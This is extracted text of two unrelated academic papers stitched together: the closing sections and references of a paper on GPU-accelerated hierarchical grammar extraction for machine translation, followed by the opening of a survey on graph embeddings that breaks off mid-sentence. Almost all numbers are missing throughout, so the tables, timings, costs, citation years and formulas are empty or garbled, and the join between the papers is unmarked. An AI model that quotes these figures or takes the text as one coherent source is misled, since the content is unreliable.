conducted experiments where the sentences are fed, one by one, to the gpu grammar extraction algorithm. results are shown in table , with a comparison to a single- threaded cpu baseline. to be consistent with the other results, we also measure speed in terms of throughput here. note that we are not aware of any freely available multi-threaded cpu algorithm to process an individual sentence in parallel, so the single-thread cpu comparison is reasonable. we observe that the gpu is slower only with sam- pling on the smaller xinhua data. in all other parallel sub-sentential parsing has been known for many years (chandwani et al., ) although we don’t know of an implementation in any major open-source mt systems. queries k k k k gpu pbmt s s s s gpu hiero s s s s slowdown . × . × . × . × table : grammar extraction time comparing this work (gpu hiero) and the work of he et al. ( ) (gpu pbmt). cases, sentence-by-sentence processing on the gpu achieves a similar level of performance or is faster. next, we compare the performance of hierarchical grammar extraction to phrase-based extraction on the gpu with sampling. we replicated the test data condition of he et al. ( ) so that our first k query sentences are the same as those used in their exper- iments. the results are shown in table , where we report grammar extraction time for batches of different sizes; the bottom row shows the slowdown of the hierarchical vs. non-hierarchical grammar conditions. this quantifies the performance penalty to achieve the translation quality gains reported in table . hierarchical grammar extraction is about three times slower, primarily due to the computa- tional costs of the new passes presented in § . another aspect of performance is memory foot- print. we report the memory use (cpu ram) of all four conditions in table . the values reported for the cpu implementation use a single thread only. at runtime, our hierarchical gpu system exhibits peak cpu memory use of gb on the host machine. most of this memory is consumed by batching ex- cpu gpu pbmt . gb . gb hiero . gb . gb table : memory consumption (cpu ram) for different experimental conditions. tracted phrases before scoring in passes through . since the phrase-based gpu implementation processes far fewer phrases, the memory footprint is much smaller. the cpu implementations pro- cess extracted phrases in small batches grouped by source phrase, and thus exhibit less memory usage. however, these levels of memory consumption are modest considering modern hardware. in all other respects, memory usage is similar for all systems, since the suffix array and associated data structures are all linear in the size of the indexed parallel text. . per-pass speed to obtain a detailed picture of where the gpu speedups and bottlenecks are, we collected per-pass timing statistics. table shows results for grammar extraction on k queries using the xinhua data with no sampling and default length constraints (passes in gray occur on the gpu; all others on the cpu). these numbers explain the decreased speed of hi- erarchical extraction compared to he et al. ( ), with the new passes (shown in italics) accounting for more than % of the total computation time. however, even passes that are nominally the same actually require more time in the hierarchical case: in extracting and scoring phrases associated with a contiguous pattern u, we must now also extract and score patterns ? u, u ?, and ? u ?. interestingly, the cpu portions of our algorithm account for around half of the total grammar ex- traction time. one way to interpret this observation is that the massive parallelization provided by the gpu is so effective that we are bottlenecked by the cpu. in our current design, the cpu portions are those that cannot be easily parallelized on the gpu or those that require too much memory to fit on the gpu. the former is a possible target for optimization in future work, though the latter will likely be solved by hardware advances alone: for example, the tesla k has gb of memory. pass time % contig. pattern pass . . % contig. pattern pass . . % one-gap pattern generation . . % one-gap pattern matching . . % two-gap pattern generation . . % two-gap pattern matching . . % gappy pattern processing . . % contig. pattern extraction . . % two-gap pattern extraction . . % one-gap pattern extraction . . % one gap translation features . . % two gap translation features . . % contig. translation features . . % lexical weight feature . . % data transfer and control . . % total . . % table : detailed timings (in seconds) for k queries. passes in gray occur on the gpu; all others on the cpu. passes needed for hierarchical grammars are in italics, which are not present in he et al. ( ). . end-to-end speed what is the benefit of using gpus in an end-to- end translation task? since we have shown that both the cpu and gpu implementations achieve near-identical translation quality, the difference lies in speed. but speed is difficult to measure fairly: translation involves not only grammar extraction but also decoding and associated i/o. we have focused on grammar extraction on the gpu, but our research vision involves eventually moving all components of the machine translation pipeline onto the gpu. the experiments we describe below capture the performance advantages of our implementation that are achievable today, using cdec for decoding (on the cpu, using threads). to measure end-to-end translation speed using pycdec, per-sentence grammars are first extracted for a batch of sentences and written to disk, then read from disk during decoding. therefore, we report times separately for grammar extraction, disk i/o, and decoding (which includes time for reading the grammar files from disk back into memory). grammar extraction is either performed on the gpu grammar extraction disk i/o decoding gpu: . s . s cpu: s cpu: . s table : running times for an end-to-end translation pipeline over nist test data. grammar extraction is either performed on the gpu or the cpu ( threads); other stages are the same for both conditions (decoding uses threads). or on the cpu (using threads), same as the experiments described in the previous section. results are shown in table using the xinhua training data and nist test data ( sentences, , words). all experiment settings are ex- actly the same as in the previous section. we observe an end-to-end translation throughput of words/second with gpu grammar extraction and words/second on the cpu ( threads), for a speedup of . ×. despite the speedup, we note that this experiment favors the cpu for several reasons. first, the gpu is idle during decoding, but it could be used to process grammars for a subsequent batch of sentences in a pipelined fashion. second, nist is a small batch that doesn’t fully saturate the gpu—throughput keeps increasing by a large margin with larger batch sizes (see results in table ). third, in comparison to the -thread cpu baseline, our gpu extraction only uses a single thread on the cpu throughout its execution, thus the cpu portion of the performance can be further improved, especially in the feature generation passes (see § . for details). of course, the gpu/cpu combination requires a server equipped with a gpu, incurring additional hardware costs. we estimate that in q dollars, our base system would cost roughly $ usd, and the gpu would cost another $ usd. however, the server-grade gpu used in this work is not the only choice: a typical high-end consumer gpu, such as the nvidia gtx titan black (around $ ), costs considerably less but has even higher memory bandwidth and with similarly impressive floating point performance. this price difference is due to extra functionalities (e.g., error-correcting code memory) for specific applications (e.g., sci- entific computing), and is not directly related to differences in raw computational power. this means that we could speed up overall translation by % if we spend an additional % (server-grade gpu) or % (consumer-grade gpu) on hardware. from an economic perspective, this is an attractive proposi- tion. of course, the advantages of using gpus for high-throughput translation go up further with larger batch sizes. . one-time construction costs construction of static data structures for on-demand grammar extraction is a one-time cost given a corpus t . however, under a streaming scenario where we might receive incremental changes to t as new training data become available, we need to update the data structures appropriately. updating static data structures involves two costs: the suffix array with its lcp array and the precom- putation indexes. we do not consider the alignment construction cost as it is external to cdec (and is a necessary step for all implementations). for the xinhua data, building the suffix array using a single cpu thread takes . seconds and building the precomputation indexes on the gpu takes . seconds. compared to table , these one-time costs represent approximately % of the gpu grammar extraction time. it is possible to lower the construction costs of these data structures given recent advances. lev- enberg et al. ( ) describe novel algorithms that allow efficient in-place updates of the suffix array when new training data arrive. that work directly tackles on-demand smt architectures in the stream- ing data scenario. alternatively, the speed of suffix array construction can be improved significantly by the cuda data parallel primitives library, which provides fast sorting algorithms to efficiently construct suffix arrays on the gpu. minimizing data preparation costs has not been a focus of this work, but we believe that the massive parallelism provided by the gpu represents promising future work. conclusions and future work the increasing demands for translation services be- cause of globalization (pangeanic, ; sykes, ) make high-throughput translation a realistic http://cudpp.github.io/cudpp/ . / http://cudpp.github.io/cudpp/ . / scenario, and one that our gpu implementation is highly suited to serve. high-throughput translation also enables downstream applications such as doc- ument translation in cross-language information re- trieval (oard and hackett, ), where we translate the entire source document collection into the target language prior to indexing. the number of transistors on a chip continues to increase exponentially, a trend that even pessimists concede should continue at least until the end of the decade (vardi, ). computer architects widely agree that instruction-level hardware parallelism is long past the point of diminishing returns (olukotun and hammond, ). this has led to a trend of placing greater numbers of cores on the same die. the question is how to best utilize the transistor budget: a small number of complex cores, a large number of simple cores, or a mixture of both? for our problem, it appears that we can take advantage of brute force scans and fine-grained parallelism inherent in the problem of on-demand extraction, which makes investments in large numbers of simple cores (as on the gpu) a win. this observation is in line with trends in other ar- eas of computing. many problems in computational biology, like computational linguistics, boil down to efficient search on discrete sequences of symbols. dna sequence alignment systems mummergpu (schatz et al., ) and mummergpu (trap- nell and schatz, ) use suffix trees to perform dna sequence matching on the gpu, while the state-of-the-art system mummurgpu++ (gharaibeh and ripeanu, ) uses suffix arrays, as we do here. our algorithms for matching gappy patterns in passes and are closely related to seed-and-extend algorithms for approximate matching in dna se- quences, which have recently been implemented on gpus (wilton et al., ). it is unlikely that cpu processing will become obsolete, since not all problems can be cast in a data- parallel framework. ultimately, we need a hybrid architecture where parallelizable tasks are offloaded to the gpu, which works in conjunction with the cpu to handle irregular computations in a pipelined fashion. in a well-balanced system, both the gpu and the cpu would be fully utilized, performing the types of computation they excel at, unlike in our current design, where the gpu sits idle while the cpu finishes decoding. a part of our broad research agenda is exploring which aspects of the machine translation pipeline are amenable to gpu algorithms. the performance analysis in § . shows that even in grammar extraction there are cpu bottlenecks we need to address and opportunities for further optimization. beyond grammar extraction, there is a question about whether decoding can be moved to the gpu. memory is a big hurdle: since accessing data struc- tures off-gpu is costly, it would be preferable to hold all models in gpu memory. we’ve addressed the problem for translation models, but the language models used in machine translation are also large. it might be possible to use lossy compression (tal- bot and osborne, ) or batch request strategies (brants et al., ) to solve this problem. if we do, we believe that translation models could be decoded using variants of gpu algorithms for speech (chong et al., ) or parsing (yi et al., ; canny et al., ; hall et al., ), though the latter algorithms exploit properties of latent-variable grammars that may not extend to translation. thinking beyond decoding, we believe that other problems in compu- tational linguistics might benefit from the massive parallelism offered by gpus. acknowledgments this research was supported in part by the bolt program of the defense advanced research projects agency, contract no. hr - -c- ; nsf under award iis- ; and the human language technology center of excellence at johns hopkins university. any opinions, findings, conclusions, or recommendations expressed in this paper are those of the authors and do not necessarily reflect views of the sponsors. the second author is grateful to esther and kiri for their loving support and dedicates this work to joshua and jacob. we thank nikolay bogoychev and the anonymous tacl re- viewers for helpful comments on previous drafts, rich cox for support and advice, and clip labmates (particularly junhui li and wu ke) for helpful discussions. we also thank umiacs for providing hardware resources via the nvidia cuda center of excellence, and the umiacs it staff, especially joe webster, for excellent support. references paul baltescu and phil blunsom. . a fast and simple online synchronous context free grammar extractor. the prague bulletin of mathematical linguistics, ( ): – . thorsten brants, ashok c. popat, peng xu, franz j. och, and jeffrey dean. . large language models in machine translation. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll ), pages – . chris callison-burch, colin bannard, and josh schroeder. . scaling phrase-based statistical machine translation to larger corpora and longer phrases. in proceedings of the rd annual meeting on association for computational linguistics (acl ), pages – . john canny, david hall, and dan klein. . a multi-teraflop constituency parser using gpus. in proceedings of the conference on empirical methods in natural language processin (emnlp ), pages – . victor chahuneau, noah a. smith, and chris dyer. . pycdec: a python interface to cdec. in proceedings of the th machine translation marathon (mtm ). m. chandwani, m. puranik, and n. s. chaudhari. . on cky-parsing of context-free grammars in parallel. in proceedings of technology enabling tomorrow: computers, communications and automation towards the st century, pages – . david chiang. . hierarchical phrase-based translation. computational linguistics, ( ): – . david chiang. . hope and fear for discriminative training of statistical translation models. journal of machine learning research, : – . jike chong, ekaterina gonina, youngmin yi, and kurt keutzer. . a fully data parallel wfst-based large vocabulary continuous speech recognition on a graphics processing unit. in proceedings of the th annual conference of the international speech communication association (interspeech ), pages – . jonathan h. clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statistical machine translation: controlling for optimizer instability. in proceedings of the th annual meeting of the association for computational linguistics (acl ), pages – . chris dyer, adam lopez, juri ganitkevitch, johnathan weese, ferhan ture, phil blunsom, hendra setiawan, vladimir eidelman, and philip resnik. . cdec: a decoder, alignment, and learning framework for finite-state and context-free translation models. in proceedings of the acl system demonstrations, pages – . michel galley and christopher d. manning. . accurate non-hierarchical phrase-based translation. in human language technologies: the annual conference of the north american chapter of the as- sociation for computational linguistics (hlt/naacl ), pages – . abdullah gharaibeh and matei ripeanu. . size matters: space/time tradeoffs to improve gpgpu applications performance. in proceedings of the acm/ieee international conference for high performance computing, networking, storage and analysis (sc ), pages – . jesús gonzález-rubio, daniel ortiz-martı́nez, and francisco casacuberta. . active learning for interactive machine translation. in proceedings of the th conference of the european chapter of the association for computational linguistics (eacl ), pages – . david hall, taylor berg-kirkpatrick, and dan klein. . sparser, better, faster gpu parsing. in proceed- ings of the nd annual meeting of the association for computational linguistics (acl ), pages – . hua he, jimmy lin, and adam lopez. . massively parallel suffix array queries and on-demand phrase extraction for statistical machine translation using gpus. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . jared hoberock and nathan bell. . thrust: a parallel template library. version . . . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meeting of the acl on interactive poster and demonstration sessions, pages – . abby levenberg, chris callison-burch, and miles osborne. . stream-based translation models for statistical machine translation. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics (hlt/naacl ), pages – . adam lopez. . hierarchical phrase-based translation with suffix arrays. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll ), pages – . adam lopez. a. machine translation by pattern matching. ph.d. dissertation, university of maryland, college park, maryland, usa. adam lopez. b. tera-scale translation models via pattern matching. in proceedings of the nd in- ternational conference on computational linguistics (coling ), pages – . udi manber and gene myers. . suffix arrays: a new method for on-line string searches. in proceedings of the first annual acm-siam symposium on discrete algorithms (soda ’ ), pages – . douglas w. oard and paul hackett. . document translation for cross-language text retrieval at the university of maryland. in proceedings of the th text retrieval conference (trec- ). franz josef och, christoph tillmann, and hermann ney. . improved alignment models for statistical machine translation. in proceedings of the joint sigdat conference on empirical methods in natural language processing and very large corpora (emnlp ), pages – . kunle olukotun and lance hammond. . the future of microprocessors. acm queue, ( ): – . pangeanic, . what is the size of the translation industry? http://www.pangeanic.com/knowledge center/size-translation-industry/. aaron b. philips. . modeling relevance in statistical machine translation: scoring alignment, context, and annotations of translation instances. ph.d. thesis, carnegie mellon university. michael schatz, cole trapnell, arthur delcher, and amitabh varshney. . high-throughput sequence alignment using graphics processing units. bmc bioinformatics, ( ): . michel simard, nicola cancedda, bruno cavestro, marc dymetman, eric gaussier, cyril goutte, and kenji yamada. . translating with non-contiguous phrases. in proceedings of human language technology conference and conference on empirical methods in natural language processing (emnlp ), pages – . patrick simianer, stefan riezler, and chris dyer. . joint feature selection in distributed stochastic learning for large-scale discriminative training in smt. in proceedings of the th annual meeting of the association for computational linguistics (acl ), pages – . tanisha sykes, . growth in translation. http://www.inc.com/articles/ / /translation.html. david talbot and miles osborne. . randomised language modelling for statistical machine translation. in proceedings of the th annual meeting of the association for computational linguistics (acl ), pages – . cole trapnell and michael c. schatz. . optimizing data intensive gpgpu computations for dna se- quence alignment. parallel computing, ( - ): – . moshe y. vardi. . moore’s law and the sand-heap paradox. communications of the acm, ( ): . richard wilton, tamas budavari, ben langmead, sarah wheelan, steven l. salzberg, and alex szalay. . faster sequence alignment through gpu- accelerated restriction of the seed-and-extend search space. http://dx.doi.org/ . / . youngmin yi, chao-yue lai, slav petrov, and kurt keutzer. . efficient parallel cky parsing on gpus. in proceedings of the th international conference on parsing technologies, pages – . ying zhang and stephan vogel. . an efficient phrase-to-phrase alignment model for arbitrarily long phrase and large corpora. in proceedings of the tenth conference of the european association for machine translation (eamt- ). http://www.pangeanic.com/knowledge_center/size-translation-industry/ http://www.pangeanic.com/knowledge_center/size-translation-industry/ survey on graph embeddings and their applications to machine learning problems on graphs survey on graph embeddings and their applications to machine learning problems on graphs ilya makarov , , dmitrii kiselev , nikita nikitinsky and lovro subelj hse university, moscow, russia faculty of computer and information science, university of ljubljana, ljubljana, slovenia big data research center, national university of science and technology misis, moscow, russia abstract dealing with relational data always required significant computational resources, domain expertise and task-dependent feature engineering to incorporate structural information into a predictive model. nowadays, a family of automated graph feature engineering techniques has been proposed in different streams of literature. so-called graph embeddings provide a powerful tool to construct vectorized feature spaces for graphs and their components, such as nodes, edges and subgraphs under preserving inner graph properties. using the constructed feature spaces, many machine learning problems on graphs can be solved via standard frameworks suitable for vectorized feature representation. our survey aims to describe the core concepts of graph embeddings and provide several taxonomies for their description. first, we start with the methodological approach and extract three types of graph embedding models based on matrix factorization, random-walks and deep learning approaches. next, we describe how different types of networks impact the ability of models to incorporate structural and attributed data into a unified embedding. going further, we perform a thorough evaluation of graph embedding applications to machine learning problems on graphs, among which are node classification, link prediction, clustering, visualization, compression, and a family of the whole graph embedding algorithms suitable for graph classification, similarity and alignment problems. finally, we overview the existing applications of graph embeddings to computer science domains, formulate open problems and provide experiment results, explaining how different networks properties result in graph embeddings quality in the four classic machine learning problems on graphs, such as node classification, link prediction, clustering and graph visualization. as a result, our survey covers a new rapidly growing field of network feature engineering, presents an in-depth analysis of models based on network types, and overviews a wide range of applications to machine learning problems on graphs. subjects artificial intelligence, data mining and machine learning, network science and online social networks, theory and formal methods, world wide web and web science keywords graph embedding, knowledge representation, machine learning, network science, geometric deep learning, graph neural networks, node classification, link prediction, node clustering, graph visualization how to cite this article makarov i, kiselev d, nikitinsky n, subelj l. . survey on graph embeddings and their applications to machine learning problems on graphs. peerj comput. sci. :e doi . /peerj-cs. submitted july accepted december published february corresponding authors ilya makarov, iamakarov@hse.ru dmitrii kiselev, dkiseljov@hse.ru academic editor xiangjie kong additional information and declarations can be found on page doi . /peerj-cs. copyright makarov et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:iamakarov@�hse.�ru mailto:dkiseljov@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction many instances in the real world can be modeled as graphs or networks. some of the typical examples include social interactions, biological data, such as protein interactions or neural connections, links between websites on the internet, etc. one of the main goals of graph modeling is to formulate a general technique capable of processing structural data including relations between objects, which may also have some domain-specific information. for example, given a social network, we might be interested in predicting whether a pair of users are friends, or in identifying communities of interconnected users. the former leads to a link prediction problem on the graph, while the latter describes a node clustering problem. we focus on graph representation theory, aiming to automatically learn low- dimensional vector features for the simplest graph motifs, such as nodes and edges, in a way that would enable efficiently solve machine learning problems on graphs including node classification, link prediction, node clustering, while also tackling approaches for graph similarity and classification, and general aspects of graph visualization. before the emergence of the area, the extraction of important features for predictive tasks on graphs had to be manually engineered. it required a lot of efforts from the domain experts. for example, many approaches for graph representation rely on extracting summary statistics, such as vertex degrees or clustering coefficients (bhagat, cormode & muthukrishnan, ) popular in social sciences, graph kernels (vishwanathan et al., ) particularly used in computational biology to compute inner product similarities between graphs, or specifically designed features to measure neighborhood similarity (liben-nowell & kleinberg, ). in addition to the time-consuming feature engineering, such summaries were very inflexible, task/data-dependent, and did not generalize well across different prediction tasks on graphs. an alternative methodology is to learn feature representations automatically as an optimization problem. the goal is to design objective cost functions that capture dependencies and similarities in a graph while preserving high quality in relational machine learning tasks and constructing graph embeddings under efficiency constraints over time and memory. today, there exists a large variety of graph embeddings automatically extract vector representation for networks (moyano, ; hamilton, ying & leskovec, b; cai, zheng & chang, ; cui et al., ; goyal & ferrara, ; chen et al., a; wu et al., b), knowledge graphs (nickel et al., ) and biological data (su et al., ). some of these algorithms only work with structural information, such as popular node vec (grover & leskovec, ), line (tang et al., ), deepwalk (perozzi, al-rfou & skiena, ), while others like gcn (kipf & welling, a), graphsage (hamilton, ying & leskovec, a), vgae (kipf & welling, b) also use node attributes. the methods also differ based on whether a given graph is (un)directed, (un)weighted, (non-)attributed, (dis)assortative, if it changes over time in terms of adding/deleting nodes/edges, and whether they use a transductive or inductive approach for learning network dynamics inference. all of these models have their advantages and shortcomings, but what unifies them is the unique pipeline to verify the network embedding model in terms of the quality makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of machine learning tasks on benchmark datasets. in addition, authors measure construction and inference time efficiency, memory consumption, and a possibility to include graph dynamics in the model. most surveys on graph embeddings provide a simple taxonomy for graph models based on how the model is fitted and only show applications within the graph domain, for example, node classification or link prediction (moyano, ; hamilton, ying & leskovec, b). goyal & ferrara ( ) provide experiments and study the influence of hyperparameters on different tasks. some works focus on a specific field such as attention models (lee et al., ) and graph neural networks (wu et al., b; chen et al., a; zhang, cui & zhu, ). cui et al. ( ) compare models in terms of what information they preserve: structure and properties or side information. neural network approaches are usually classified by the core architecture, for example, recurrent neural networks (rnn) or convolutional neural networks (cnn), and losses for different tasks, such as cross-entropy for link prediction and node classification and reconstruction loss for unsupervised representation learning. chen et al. ( a) provides meta-strategies for choosing embedding models, but examine only deep learning based methods. lee et al. ( ) follow the classification of cai, zheng & chang ( ) and separate attention models by type of input and output, deriving recommendations for working with different graphs (heterogeneity, multi-view, directed acyclic graphs) and on different tasks (node classification, clustering, ranking, alignment, link prediction). zhang, cui & zhu ( ) is quite similar to other gnn surveys, but also provides an overview of modern models and tasks like reinforcement learning on graphs, analyses techniques for better representation learning like sampling strategies, skip connections, inductive learning and adversarial training. in contrast, our work tries to generalize the advances of previous surveys. our survey is not limited to specific model types and provides an overview from different angles: training process, input graph properties, specific tasks and applications in a non-graph domain, and open problems, etc. the paper is structured as follows. we start with a brief explanation of general approaches to learn network embedding and introduce to a reader the core ideas of graph representation models. next, we describe different models adapted to specific types of networks. then, we state the most crucial machine learning problems on graphs and solutions to them based on network embeddings. to cover the use of overviewed models, we provide applications to other machine learning domains. we finalize review sections with the listing of open problems in the field of network representation learning. finally, we provide our experiments to understand in practice, how different graph embeddings perform on benchmark network datasets and interpret, why the chosen graph embedding model with a given training setting result in good or bad quality on a given benchmark dataset and how it is related to the method behind the model. our experiment section aims to show how one can choose the best graph embedding by the nature of the model construction and network descriptive statistics, which is one the most interesting problems for practical applications of graph embeddings for machine learning frameworks. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ preliminaries before describing any methods we need to introduce some definitions. we will use v as a set of graph vertices, e as a set of graph edges, a as graph adjacency matrix and g(v, e) as graph description. the procedure on constructing vector representation of a graph we are interested in is called graph embedding. definition (graph embedding) is a mapping from a collection of substructures (most commonly either all nodes, or all edges, or certain subgraphs) to rd. we will mostly consider node embeddings: f : v ! rd; d � jvj. for many graph-based tasks, the most natural task formulation is unsupervised learning: this is the case when we need to learn embeddings using only the adjacency matrix a containing information on structural similarity and possibly attributed features x, but without task-specific loss part. it is also possible that there are labels available for some substructures of the graph, and we wish to recover missing labels in a semi-supervised approach. one example of this is node classification, in which all nodes are available from the outset, but only a fraction is labeled. now let us clarify what is meant by a good embedding. by the embedding procedure, one should aim to compress the data, while retaining most of the essential information about similarities and simultaneously, extract important features from the structural information. what counts as essential may vary depending on an intended application; most common properties we want to capture in a graph are termed as node proximity and structural similarity (neighbourhood information and structural role, respectively). definition (first and second order proximities) the first-order proximity describes the pairwise proximity between vertices. for any vertices, the weight aij (possibly zero) of the edge between vi and vj characterizes the first-order proximity between these vertices, thus representing adjacency matrix a ¼ ðaijÞni;j¼ . a neighborhood of vertex vi is defined as a set of adjacent vertices nvi ¼ fvkjaik > ; k ¼ ig thus meaning that vertex itself is not included in its neighborhood. the second-order proximity between a pair of vertices vi and vj describes the similarity measure between their neighborhood structures nvi and nvj with respect to a selected proximity measure. methods for constructing graph embedding we briefly describe graph embedding methods of three general categories, corresponding to the perspective they take on embedding graphs: matrix factorizations, node sequence methods and deep learning based methods. these are, of course, not mutually exclusive, but it is more convenient to adhere to their primary features. we also cover a specific type of embeddings based on embedding space metric. we select papers from several curated lists and major conferences on network science, artificial intelligence, machine learning and data mining, as well as core research publishers and indexing services. paper sources are referred in table . we used the following keywords: graph/network embeddings, graph/network representation, graph neural networks, graph convolutional networks, graph convolution, graph attention, makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ graph/network classification/link prediction/clustering, deep learning for graphs, geometric deep learning, gcn, gnn, gat. historically the first graph embedding methods were factorization based, which generally try to approximate a large matrix with a low-rank matrix factorized into a product of two matrices containing representations, thus modeling each entry of the original matrix with an inner product of representations. sequence-based embeddings linearize the graph using random walks or diffusion and maximize the probability of observing the neighborhood (context) of a node given its embedding. deep learning-based models learn a function mapping a graph in the numeric form to a low-dimensional embedding by optimizing over a broad class of expressive neural network functions. dimensionality reduction (matrix factorization) methods definition (matrix factorization) is a decomposition of a matrix to the product of matrices. in this sense, the first matrix in series is named self node representation and the last matrix refers to node context. table paper sources. name link description curated lists by chen https://github.com/chihming/ awesome-network-embedding by rozemberczki https://github.com/benedekrozemberczki/ awesome-graph-classification by rebo https://github.com/maxwellrebo/ awesome- vec by soru https://gist.github.com/mommi / awesome-kge conferences complex networks https://complexnetworks.org/ international conference on complex networks and their applications the web https://www .thewebconf.org/ the web conference is international conference on the world wide web. wsdm http://www.wsdm-conference.org/ web-inspired research involving search and data mining ijcai https://www.ijcai.org/ international joint conferences on artificial intelligence aaai https://www.aaai.org/ association for the advancement of artificial intelligence icml https://icml.cc/ international conference on machine learning sigkdd https://www.kdd.org/ special interest group in knowledge discovery and databases domain conferences acl http://www.acl .org/ association for computational linguistics cvpr http://cvpr .thecvf.com/ conference on computer vision and pattern recognition publishers acm dl https://dl.acm.org/ full-text articles database by association for computing machinery ieee xplore https://ieeexplore.ieee.org/xplore/home.jsp research published by institute of electrical and electronics engineers link springer https://link.springer.com/ online collection of scientific journals, books and reference works indexing services scopus https://www.scopus.com/ abstract and citation database web of science https://www.webofknowledge.com/ citation indexer scholar google https://scholar.google.com/ web search engine for indexing full-text papers or its metadata makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/chihming/ https://github.com/benedekrozemberczki/ https://github.com/maxwellrebo/ https://gist.github.com/mommi / https://complexnetworks.org/ https://www .thewebconf.org/ http://www.wsdm-conference.org/ https://www.ijcai.org/ https://www.aaai.org/ https://icml.cc/ https://www.kdd.org/ http://www.acl .org/ http://cvpr .thecvf.com/ https://dl.acm.org/ https://ieeexplore.ieee.org/xplore/home.jsp https://link.springer.com/ https://www.scopus.com/ https://www.webofknowledge.com/ https://scholar.google.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ factorization models are common techniques in different machine learning domains to receive meaningful low-dimensional representation. moreover, a lot of methods use similarity matrix between observations, which can also be reformulated as the graph similarity matrix. factorization techniques can be applied to a different graph representations and optimize different objectives. some methods directly decompose the adjacency matrix a, for example, mds (kruskal & wish, ) reconstructs it by minimizing mse between element aij and euclidean distance between vectors ui and uj of manifold u. we can rewrite this with expression pn i¼ pn j¼ aij � kui � ujk � � . lsi (deerwester et al., ) simply applies singular value decomposition to a golub & reinsch ( ). in wold, esbensen & geladi ( ) the manifolds are learned by maximizing variance for linear mixture. it is extended by lda martinez & kak ( ). another way to use dimensionality reduction is to build proximity matrix of the graph. for example, isomap (tenenbaum, de silva & langford, ) use shortest path matrix d and apply mds to learn embeddings. lle (roweis & saul, ) learns node similarity by reconstructing weights matrix w with which neighboring nodes affect each other: kx � wtuk and repeats that procedure to learn manifold u with achieved matrix w. lpp (he & niyogi, ) estimates the weighted matrix w as heat kernel and learn manifold u by reduction of w with laplacian eigenmaps technique. isomap and lle were proposed to model global structure while preserving local distances or sampling from the local neighborhood of nodes. the lower bound for methods complexity was quadratic in the number of vertices, still making them inappropriate for large networks. definition (graph laplacian) if matrix d is the diagonal degree matrix, that is d ¼ diagð�jaijÞ, then laplacian matrix can be defined as l = d − a. another approach for spectral graph clustering (chung & graham, ) was suggested in belkin & niyogi ( ) named laplacian eigenmaps (le), representing each node by graph laplacian eigenvectors associated with its first k nontrivial eigenvalues. the goal for laplacian eigenmaps class of models lies in preserving first-order similarities. thus, a model gives a larger penalty using graph laplacian if two nodes with larger similarity are embedded far apart in the embedding space. laplacian objective function is symmetric in each pair (i, j), and thus it cannot capture edge orientations. kernel eigenmaps (brand, ) extends this approach to nonlinear cases. in contrast to le, which preserved nodes dissimilarity, cauchy embedding (luo et al., ) proposes optimization condition modification which preserves the similarity between vertices. structure preserving embedding (spe) (shaw & jebara, ) aims to use le combined with preserving spectral decomposition representing the cluster structure of the graph. it introduces a new graph kernel and applies svd to it. graph factorization (gf) (ahmed et al., ) try to solve the scalability issue of factorization methods by decreasing node neighborhood via graph partitioning and utilizing distributed computation. the models in this class can be either symmetric and obtain final representations only from embedding matrix. grarep (cao, lu & xu, ) consider k-hop neighborhood (ak) makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using svd decomposition of ak. hope (ou et al., ) is specific asymmetric transitivity preserving graph embedding. it is found that most asymmetric similarity measures can be formulated as s ¼ m� g ml. katz index refers to mg = i − βa, ml = βa. rooted pagerank can be stated as mg = i − αp, ml = ( − α) p. common neighbors is represented by mg = i, ml = a , and adamic-adar with mg = i, ml = a· d· a. to avoid calculation of similarity matrix authors propose to use generalized svd and directly estimate matrices mg and ml. abu-el-haija, perozzi & al-rfou ( ) proposed to use concatenation of two node representations capturing in- and out-connections. authors of wang et al. ( d) proposed a modularized nonnegative matrix factorization (m-nmf) model to preserve the community structure in network representation. in atp model (sun et al., ) authors embed directed graph constructing two vectors for each node via factorization framework. kefato, sheikh & montresor ( ) propose multi-objective framework for preserving directed nature of graph. sdne (wang, cui & zhu, ) uses autoencoders (as neural network based dimension reduction technique) to capture non-linear dependencies in local proximity. factorization based models are the best-studied theoretically and provide a well-known general framework for graph embedding optimization (liu et al., ), however, they suffer from high computational complexity for large graphs and often capture only a small-order proximity perozzi, al-rfou & skiena ( ). sequence-based approaches definition (random walk on graph) is a sequence of nodes obtained from the random process of node sampling. usually, probability of choice of node j after node i is proportional to ai,j. motivated by drawbacks of the matrix factorization approach, another approach emerged that attempts to preserve local neighborhoods of nodes and their properties based on random walks (newman, ; pirotte et al., ). more specifically, the main idea is to maximize the probability of observing the neighborhood of a node given its embedding, following the line of skip-gram model initiated in nlp applications by mikolov et al. ( ), pennington, socher & manning ( ). an objective of this type can be efficiently optimized with stochastic gradient descent on a single-layer neural network, and hence has lower computational complexity. definition (skip-gram) is method to learn sequence element i representation via maximization of probability of elements in context of i based on representation of i. two prominent examples of models in this class are node vec (grover & leskovec, ) and deepwalk (perozzi, al-rfou & skiena, ). deepwalk performs a random walk over a graph and then uses sampled sequences to learn embeddings, using the skip-gram objective (while having modifications for other nlp based sequence models, such as using glove from brochier, guille & velcin ( )). its predecessor line (tang et al., ) is equivalent to deepwalk when the size of vertices’ contexts is set makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to one. node vec extends the 